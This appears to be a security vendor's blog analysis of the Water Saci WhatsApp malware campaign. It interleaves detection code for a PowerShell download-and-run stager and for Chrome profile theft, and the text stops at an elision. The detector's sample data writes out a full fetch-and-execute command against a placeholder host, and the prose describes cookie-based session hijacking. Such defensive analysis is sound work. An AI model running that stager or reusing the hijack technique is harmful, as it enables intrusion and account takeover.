
Active Water Saci Campaign Spreading Via WhatsApp Features Multi-Vector Persistence and Sophisticated C&C

Continuous investigation of the Water Saci campaign reveals an innovative email-based C&C system, multi-vector persistence, and real-time command capabilities that allow attackers to orchestrate coordinated botnet operations, gather detailed campaign intelligence, and dynamically control malware activity across multiple infected machines.


Malware


By: Jeffrey Francis Bonaobra, Joe Soares, Emmanuel Panopio

Oct 27, 2025



*With contributions from Paul John Bardon, Ieriz Nicolle Gonzalez, Joshua Paul Ignacio, Ian Kenefick, Victor Bertho, Valentim Uliana, Guilherme Marcelino de Sa, Laercio Maciel, Matheus Perestrelo, Felippe Barros, Pedro Alberto Costa, Gustavo Silva*

Key takeaways:

  • Further investigation into the active Water Saci campaign shows a new attack chain that utilizes an email-based C&C infrastructure, employs multi-vector persistence for resilience, and incorporates advanced checks to evade analysis and restrict activity to specific targets.
  • The new attack chain also features a sophisticated remote command-and-control system that allows threat actors real-time management, including pausing, resuming, and monitoring the malware’s campaign, effectively converting infected machines into a botnet tool for coordinated, dynamic operations across multiple endpoints.
  • Trend Vision One™ detects and blocks the IoCs discussed in this blog. Trend Micro customers can also access tailored hunting queries, threat insights, and intelligence reports to better understand and proactively defend against this campaign. In addition, Trend customers are protected from the Water Saci campaign via the specific rules and filters listed at the end of this blog entry.

Trend™ Research is continuously tracking the aggressive malware campaign it identified as Water Saci, which uses WhatsApp as its primary infection vector. In our previous blog, the Water Saci campaign, with its malware identified as SORVEPOTEL, automatically distributes the same malicious ZIP file to all contacts and groups associated with the victim’s compromised account for rapid propagation.

More recent activity points to the emergence of a new infection chain that diverges from previously discussed .NET-based methods. On October 8, 2025, Trend Research analysis revealed file downloads originating from WhatsApp web sessions. Closer examination shows that instead of employing .NET binaries, the new chain leverages script-based techniques, orchestrating payload delivery through a combination of Visual Basic Script (VBS) downloaders and PowerShell (PS1) scripts. The following sections provide a detailed technical analysis of this evolving infection mechanism.

Technical analysis

[Figure 1. New Water Saci attack chain observed]

Figure 1. New Water Saci attack chain observed


Trend Research analysis revealed suspicious file downloads initiated through WhatsApp Web, specifically files named Orcamento-2025.zip.

[Figure 2. Downloaded Orcamento-2025.zip files as seen in Vision One]

Figure 2. Downloaded Orcamento-2025.zip files as seen in Vision One

The infection chain is initiated when a user downloads and extracts the ZIP archive, which includes an obfuscated VBS downloader named Orcamento.vbs. This VBS downloader issues a PowerShell command that carries out fileless execution via New-Object Net.WebClient to download and execute a PowerShell script named tadeu.ps1 directly in memory.

[Figure 3. Deobfuscated Orcamento.vbs]

Figure 3. Deobfuscated Orcamento.vbs
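The delivery step just described (a script host spawning PowerShell that fetches and runs a script in memory) is a compact process-creation pattern a defender can hunt for. The following Python is an added example written for this page; it is not code from the original post or from the malware. It assumes process-creation telemetry with Sysmon-style field names (Image, ParentImage, CommandLine); the sample events and the URL in them are constructed placeholders. It goes slightly beyond the observed chain by also decoding a `-EncodedCommand` payload before matching, so the same rule is not defeated by the encoded form.

```python
"""Detect the VBS -> PowerShell fileless download-and-execute pattern.

Constructed defender-side example; not code from the original post or from the
malware. Input records mimic process-creation telemetry fields (Image,
ParentImage, CommandLine) such as Sysmon Event ID 1; all samples are made up
and the URL is a placeholder.
"""
import base64
import binascii
import re

SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
POWERSHELL = ("powershell.exe", "pwsh.exe")

# Download primitives used for in-memory staging (the post names Net.WebClient).
DOWNLOAD_RE = re.compile(r"Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest", re.I)
# Execution of the downloaded text without writing it to disk.
EXEC_RE = re.compile(r"\bIEX\b|Invoke-Expression", re.I)
# -e / -ec / -enc / -EncodedCommand followed by base64 (UTF-16LE payload).
ENCODED_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def expand_command_line(cmdline: str) -> str:
    """Append the decoded -EncodedCommand payload, if any, so the regexes see it.

    Beyond the post: the observed chain used a plain command line, but the
    detection should not be defeated by the encoded form.
    """
    m = ENCODED_RE.search(cmdline)
    if not m:
        return cmdline
    try:
        decoded = base64.b64decode(m.group(1), validate=True).decode("utf-16-le", "ignore")
    except binascii.Error:
        return cmdline
    return cmdline + " " + decoded


def classify(event: dict) -> list:
    """Return the indicator names matched by one process-creation event."""
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    cmd = expand_command_line(event.get("CommandLine", ""))
    hits = []
    if image not in POWERSHELL:
        return hits
    if parent in SCRIPT_HOSTS:
        hits.append("powershell_from_script_host")
    if DOWNLOAD_RE.search(cmd):
        hits.append("remote_download")
    if EXEC_RE.search(cmd):
        hits.append("in_memory_exec")
    if HIDDEN_RE.search(cmd):
        hits.append("hidden_window")
    return hits


def is_fileless_downloader(event: dict) -> bool:
    """True when a script host spawns PowerShell that downloads and executes code
    in memory, i.e. the Orcamento.vbs -> tadeu.ps1 delivery step in the post."""
    required = {"powershell_from_script_host", "remote_download", "in_memory_exec"}
    return required <= set(classify(event))


def scan(events: list) -> list:
    """Indexes of the events that match the fileless-downloader pattern."""
    return [i for i, ev in enumerate(events) if is_fileless_downloader(ev)]


# Constructed sample telemetry (placeholder URL; not a real indicator).
_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
_STAGER = "IEX (New-Object Net.WebClient).DownloadString('https://c2.example.invalid/tadeu.ps1')"
_ENCODED = base64.b64encode(_STAGER.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    # 0: the chain from the post, plain command line
    {"Image": _PS, "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": 'powershell.exe -w hidden -c "' + _STAGER + '"'},
    # 1: the same stager hidden behind -EncodedCommand
    {"Image": _PS, "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": "powershell.exe -NoProfile -EncodedCommand " + _ENCODED},
    # 2: benign interactive use
    {"Image": _PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -NoExit -Command Get-ChildItem C:\\Reports"},
    # 3: benign logon script: script host parent, but no download or in-memory execution
    {"Image": _PS, "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": "powershell.exe -File C:\\Scripts\\map-drives.ps1"},
]

if __name__ == "__main__":
    for i in scan(SAMPLE_EVENTS):
        print("ALERT event", i, classify(SAMPLE_EVENTS[i]))
```

Only events 0 and 1 trip the combined rule; the logon script (event 3) still shows the script-host parent indicator on its own, which is why the three indicators are required together rather than alerting on any one of them.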

The downloaded PowerShell script is used to hijack WhatsApp Web sessions, harvest all contacts from the victim's account, and automatically distribute malicious ZIP files to those contacts, while maintaining persistent command-and-control communication for large-scale social engineering campaigns.

tadeu.ps1 a.k.a. whatsapp_automation_v6_robust.ps1

The malware begins its sophisticated attack by displaying a deceptive banner claiming to be "WhatsApp Automation v6.0", immediately masking its malicious intent behind the guise of legitimate software. Investigation shows the consistent use of Portuguese, which suggests the threat actor's focus on Brazil.

[Figure 4. Deceptive banner displayed by tadeu.ps1]

Figure 4. Deceptive banner displayed by tadeu.ps1

Upon initialization, it generates a unique session identifier and establishes contact with its command-and-control (C&C) infrastructure at hxxps://miportuarios[.]com/sisti/config[.]php to download operational parameters including target lists, message templates, and timing configurations.

[Figure 5. Function used to download config from C&C server]

Figure 5. Function used to download config from C&C server

If the C&C server is unreachable, the malware seamlessly falls back to hardcoded default settings, ensuring the attack proceeds regardless of network conditions.

[Figure 6. Hardcoded backup configuration]

Figure 6. Hardcoded backup configuration


It creates a temporary workspace in C:\temp, downloads the latest WhatsApp automation library (WA-JS) from GitHub, and retrieves a malicious ZIP payload and saves it as Bin.zip in C:\temp.

[Figure 7. Downloading the WhatsApp automation library and the ZIP payload]

Figure 7. Downloading the WhatsApp automation library and the ZIP payload


WhatsApp web browser hijacking

Similar to how the previous attack chain hijacks WhatsApp Web browser sessions, the malware checks the installed Chrome version and downloads the appropriate ChromeDriver for browser automation. It then installs the Selenium PowerShell module, enabling automated browser tasks on the victim’s machine.

[Figure 8. Checking of installed Chrome version and downloading of ChromeDriver]

Figure 8. Checking of installed Chrome version and downloading of ChromeDriver

[Figure 9. Installing Selenium PowerShell module]

Figure 9. Installing Selenium PowerShell module

After terminating any existing Chrome processes and clearing old sessions to ensure clean operation, the malware copies the victim's legitimate Chrome profile data to its temporary workspace. This data includes cookies, authentication tokens, and the saved browser session. This technique allows the malware to bypass WhatsApp Web's authentication entirely, gaining immediate access to the victim's WhatsApp account without triggering security alerts or requiring QR code scanning.

[Figure 10. Terminating Chrome processes and sessions]

Figure 10. Terminating Chrome processes and sessions

[Figure 11. Copying of the victim's legitimate Chrome profile data]

Figure 11. Copying of the victim's legitimate Chrome profile data


With the hijacked session in place, the malware launches Chrome with specific automation flags designed to evade detection and inject the WA-JS library for WhatsApp control.

[Figure 12. Configuring Chrome with specific automation flags for defense evasion]

Figure 12. Configuring Chrome with specific automation flags for defense evasion

[Figure 13. WA-JS library injection]

Figure 13. WA-JS library injection
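The session hijack described across the last few paragraphs leaves two correlated traces: Chrome profile files (cookies, login state) written to a directory outside the real profile location, followed shortly by chrome.exe started by an automation parent and pointed at that directory. The Python below is an added defender-side example written for this page, not code from the original post or from the malware. It assumes file-create and process-create events with Sysmon-style fields; the `C:\temp\chrome_profile` path, the host names and all events are constructed, and the automation switch list is an assumption drawn from common ChromeDriver behaviour, since the post does not name the flags the malware uses.

```python
"""Correlate Chrome profile theft with an automated Chrome launch.

Constructed defender-side example; not code from the original post or from
the malware. Events are a minimal stand-in for file-create (Sysmon ID 11) and
process-create (Sysmon ID 1) telemetry. The automation switch list is an
assumption; the post does not name the flags the malware uses.
"""
import re
from collections import defaultdict

# Profile files that carry the logged-in WhatsApp Web state the malware reuses.
PROFILE_ARTIFACTS = {"cookies", "login data", "local state", "preferences", "web data"}
# Where a Chrome profile legitimately lives under the user's AppData.
LEGIT_PROFILE_DIR = re.compile(r"\\AppData\\Local\\Google\\Chrome\\User Data(?:\\|$)", re.I)
# Switches typical of browser automation (assumed indicator set, lower-cased).
AUTOMATION_FLAGS = ("--remote-debugging-port", "--enable-automation",
                    "--disable-blink-features=automationcontrolled")
AUTOMATION_PARENTS = ("powershell.exe", "pwsh.exe", "chromedriver.exe")
USER_DATA_DIR_RE = re.compile(r'--user-data-dir=(?:"([^"]+)"|(\S+))', re.I)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def user_data_dir(cmdline: str):
    """The --user-data-dir value of a Chrome command line, or None."""
    m = USER_DATA_DIR_RE.search(cmdline)
    return (m.group(1) or m.group(2)) if m else None


def profile_artifact_copied(ev: dict) -> bool:
    """A Chrome profile artifact written anywhere but the real profile directory."""
    if ev.get("type") != "FileCreate":
        return False
    target = ev.get("TargetFilename", "")
    return basename(target) in PROFILE_ARTIFACTS and not LEGIT_PROFILE_DIR.search(target)


def hijacked_chrome_launch(ev: dict) -> bool:
    """chrome.exe pointed at a foreign profile directory by an automation parent
    or carrying automation switches on its command line."""
    if ev.get("type") != "ProcessCreate" or basename(ev.get("Image", "")) != "chrome.exe":
        return False
    cmd = ev.get("CommandLine", "")
    udd = user_data_dir(cmd)
    foreign_profile = udd is not None and not LEGIT_PROFILE_DIR.search(udd)
    automated = (basename(ev.get("ParentImage", "")) in AUTOMATION_PARENTS
                 or any(flag in cmd.lower() for flag in AUTOMATION_FLAGS))
    return foreign_profile and automated


def correlate(events: list, window_s: int = 600) -> list:
    """Per host: a profile copy followed within window_s seconds by an automated
    Chrome launch whose --user-data-dir is the directory the copy went to."""
    alerts = []
    copies = defaultdict(list)  # host -> [(ts, copied file)]
    for ev in sorted(events, key=lambda e: e["ts"]):
        host = ev["host"]
        if profile_artifact_copied(ev):
            copies[host].append((ev["ts"], ev["TargetFilename"]))
        elif hijacked_chrome_launch(ev):
            udd = user_data_dir(ev["CommandLine"]).rstrip("\\").lower()
            for ts, copied in copies[host]:
                if ev["ts"] - ts <= window_s and copied.lower().startswith(udd + "\\"):
                    alerts.append({"host": host, "ts": ev["ts"], "profile_dir": udd, "copied": copied})
                    break
    return alerts


# Constructed sample telemetry; paths and hosts are made up.
_CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    # WS01: PowerShell copies the profile into a C:\temp workspace ...
    {"host": "WS01", "ts": 100, "type": "FileCreate", "Image": _PS,
     "TargetFilename": r"C:\temp\chrome_profile\Default\Cookies"},
    {"host": "WS01", "ts": 101, "type": "FileCreate", "Image": _PS,
     "TargetFilename": r"C:\temp\chrome_profile\Local State"},
    # ... then ChromeDriver starts Chrome on the copied profile with automation switches
    {"host": "WS01", "ts": 160, "type": "ProcessCreate", "Image": _CHROME,
     "ParentImage": r"C:\temp\chromedriver.exe",
     "CommandLine": '"' + _CHROME + r'" --user-data-dir=C:\temp\chrome_profile '
                    "--remote-debugging-port=9222 --disable-blink-features=AutomationControlled"},
    # WS02: Chrome maintaining its own real profile, launched by the user
    {"host": "WS02", "ts": 200, "type": "FileCreate", "Image": _CHROME,
     "TargetFilename": r"C:\Users\ana\AppData\Local\Google\Chrome\User Data\Default\Cookies"},
    {"host": "WS02", "ts": 201, "type": "ProcessCreate", "Image": _CHROME,
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": '"' + _CHROME + r'" --user-data-dir="C:\Users\ana\AppData\Local\Google\Chrome\User Data"'},
]

if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print("ALERT WhatsApp Web session hijack pattern:", alert)
```

Requiring the launch's `--user-data-dir` to be the same directory the profile files were copied into is what keeps the rule quiet on WS02, where Chrome writes its own cookies into the legitimate profile and is started by the user from Explorer.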

The malware then systematically harvests all WhatsApp contacts using sophisticated JavaScript filtering to exclude specific number patterns while collecting names and phone numbers. The harvested contact list is immediately exfiltrated to the C&C server.

[Figure 14. WhatsApp contact harvesting and filtering]

Figure 14. WhatsApp contact harvesting and filtering


[Figure 15. Sending of contact list to C&C server]

Figure 15. Sending of contact list to C&C server


Remote control mechanism

[...]

